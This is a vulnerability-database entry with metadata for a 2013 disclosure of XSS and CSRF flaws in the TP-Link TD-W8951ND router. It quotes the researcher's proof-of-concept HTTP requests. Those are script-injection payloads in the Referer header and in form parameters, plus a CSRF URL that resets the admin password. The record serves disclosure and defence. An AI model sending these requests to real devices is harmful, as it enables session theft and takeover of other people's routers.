VAR-201308-0460

Vulnerability from variot - Updated: 2022-05-17 01:43

The TP-LINK TD-W8951ND is a wireless router. Firmware 4.0.0 Build 120607 Release 30923 has multiple cross-site scripting and cross-site request forgery vulnerabilities that allow an attacker to obtain sensitive information or hijack a user's session:

1. The Referer field is handled incorrectly on requests for URLs that do not exist, which gives unauthenticated attackers a reflected cross-site scripting vulnerability.
2. The "home_wlan_1" parameters are handled incorrectly, which gives authenticated attackers a reflected cross-site scripting vulnerability.
3. There are multiple cross-site request forgery vulnerabilities: an attacker can construct a malicious URI, entice a logged-in user to open it, and perform malicious operations in the context of the target user, such as resetting the administrator password.

Attackers can use these vulnerabilities to execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized operations, and leak or modify sensitive information. Other attacks may also be possible. TP-Link TD-W8951ND 4.0.0 Build 120607.Rel. 30923 is vulnerable; other versions may also be affected.

Author:


xistence < xistence[at]0x90[.]nl >


Affected products:

Tested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923


Affected vendors:

TP-Link http://www.tp-link.com/


Details:

[ 0x01 - Unauthenticated Reflected XSS in Referer for non-existing url pages ]

GET /doesnotexist HTTP/1.1
Host: <IP>
Referer: http://pwned"><script>alert("XSS")</script>
Connection: keep-alive

[ 0x02 - Authenticated Reflected XSS in "home_wlan_1" arguments ]

http://<IP>/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://<IP>/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://<IP>/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

[ 0x03 - Authenticated XSS in diagnostics (ping) "/Forms/tools_test_1" argument "PingIPAddr" ]

POST /Forms/tools_test_1 HTTP/1.1
Host: <IP>
Referer: http://<IP>/maintenance/tools_test.htm
Authorization: Basic blablabla==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingflag=1&trace_open_flag=0&InfoDisplay=Ping+request+could+not+find+host+

[ 0x04 - Reset Admin password CSRF ]

http://<IP>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfirm=PWNED


Timeline:

2013-05-30 Provided details to TP-Link.
2013-06-01 Response from TP-Link that they will try to fix it.
2013-07-31 No further response, mailed again to ask for status.
2013-08-30 No response, public disclosure


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201308-0460",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "td-w8951nd router",
        "scope": null,
        "trust": 0.6,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "td-w8951nd build 120607.r",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "tp link",
        "version": "4.0.0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      },
      {
        "db": "BID",
        "id": "62103"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xistence",
    "sources": [
      {
        "db": "BID",
        "id": "62103"
      },
      {
        "db": "PACKETSTORM",
        "id": "123016"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-547"
      }
    ],
    "trust": 1.0
  },
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2013-12811",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "CNVD",
            "id": "CNVD-2013-12811",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The TP-LINK TD-W8951ND Router is a wireless router device. TP-LINK TD-W8951ND Router Firmware 4.0.0 Build 120607 Release 30923 has multiple cross-site scripting and cross-site request forgery vulnerabilities. Allows an attacker to exploit a vulnerability to obtain sensitive information or hijack a user\u0027s session: 1. Incorrect handling of the Referer field without a URL, allowing unauthenticated attackers to exploit the vulnerability for a reflective cross-site scripting vulnerability. 2. The \\\"home_wlan_1\\\" parameter is incorrectly handled, allowing authenticated attackers to exploit vulnerabilities for reflective cross-site scripting vulnerabilities. 3. There are multiple cross-site request forgery attacks, allowing the attacker to construct a malicious URI, enticing the login user to resolve, and performing malicious operations in the target user context, such as resetting the administrator password. Attackers can use these vulnerabilities to execute arbitrary script code in the context of the affected site. They can steal cookie-based authentication, perform unauthorized operations, leak or modify sensitive information, and there may be other forms of attacks. There are vulnerabilities in TP-Link TD-W8951ND 4.0.0 Build 120607.Rel. 30923, other versions may also be affected. Other attacks may also be possible. 
-----------\nAuthor:\n-----------\n\nxistence \u003c xistence[at]0x90[.]nl \u003e\n\n-------------------------\nAffected products:\n-------------------------\n\nTested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923\n\n-------------------------\nAffected vendors:\n-------------------------\n\nTP-Link\nhttp://www.tp-link.com/\n\n----------\nDetails:\n----------\n\n[ 0x01 - Unauthenticated Reflected XSS in Referer for non-existing url\npages ]\n\nGET /doesnotexist HTTP/1.1\nHost: \u003cIP\u003e\nReferer: http://pwned\"\u003e\u003cscript\u003ealert(\"XSS\")\u003c/script\u003e\nConnection: keep-alive\n\n\n[ 0x02 - Authenticated Reflected XSS in \"home_wlan_1\" arguments ]\n\nhttp://\n\u003cIP\u003e/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E\nhttp://\n\u003cIP\u003e/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E\nhttp://\n\u003cIP\u003e/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E\n\n\n[ 0x03 - Authenticated XSS in diagnostics (ping) \"/Forms/tools_test_1\"\nargument \"PingIPAddr\" ]\n\nPOST /Forms/tools_test_1 HTTP/1.1\nHost: \u003cIP\u003e\nReferer: http://\u003cIP\u003e/maintenance/tools_test.htm\nAuthorization: Basic blablabla==\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 164\n\nTest_PVC=PVC0\u0026PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E\u0026pingflag=1\u0026trace_open_flag=0\u0026InfoDisplay=Ping+request+could+not+find+host+\n\n\n[ 0x04 - Reset Admin password CSRF ]\n\nhttp://\n\u003cIP\u003e/Forms/tools_admin_1?uiViewTools_Password=PWNED\u0026uiViewTools_PasswordConfirm=PWNED\n\n--------------\nTimeline:\n--------------\n\n2013-05-30 Provided details to TP-Link. \n2013-06-01 Response from TP-Link that they will try to fix it. \n2013-07-31 No further response, mailed again to ask for status. \n2013-08-30 No response, public disclosure",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-547"
      },
      {
        "db": "BID",
        "id": "62103"
      },
      {
        "db": "PACKETSTORM",
        "id": "123016"
      }
    ],
    "trust": 1.44
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "62103",
        "trust": 1.5
      },
      {
        "db": "PACKETSTORM",
        "id": "123016",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-12811",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-547",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      },
      {
        "db": "BID",
        "id": "62103"
      },
      {
        "db": "PACKETSTORM",
        "id": "123016"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-547"
      }
    ]
  },
  "id": "VAR-201308-0460",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      }
    ],
    "trust": 1.475
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      }
    ]
  },
  "last_update_date": "2022-05-17T01:43:24.463000Z",
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 0.6,
        "url": "http://packetstormsecurity.com/files/123016/tplinktdw8951nd-xssxsrf.txt"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/62103"
      },
      {
        "trust": 0.3,
        "url": "http://www.tp-link.us/support/download/?pcid=203\u0026model=td-w8951nd"
      },
      {
        "trust": 0.1,
        "url": "http://pwned\"\u003e\u003cscript\u003ealert(\"xss\")\u003c/script\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.tp-link.com/"
      },
      {
        "trust": 0.1,
        "url": "http://\u003cip\u003e/maintenance/tools_test.htm"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      },
      {
        "db": "BID",
        "id": "62103"
      },
      {
        "db": "PACKETSTORM",
        "id": "123016"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-547"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      },
      {
        "db": "BID",
        "id": "62103"
      },
      {
        "db": "PACKETSTORM",
        "id": "123016"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-547"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-09-05T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      },
      {
        "date": "2013-08-30T00:00:00",
        "db": "BID",
        "id": "62103"
      },
      {
        "date": "2013-08-30T18:22:22",
        "db": "PACKETSTORM",
        "id": "123016"
      },
      {
        "date": "2013-08-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201308-547"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-09-05T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      },
      {
        "date": "2013-08-30T00:00:00",
        "db": "BID",
        "id": "62103"
      },
      {
        "date": "2013-09-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201308-547"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-547"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "TP-LINK TD-W8951ND Router has multiple input validation vulnerabilities",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-12811"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-547"
      }
    ],
    "trust": 0.6
  }
}

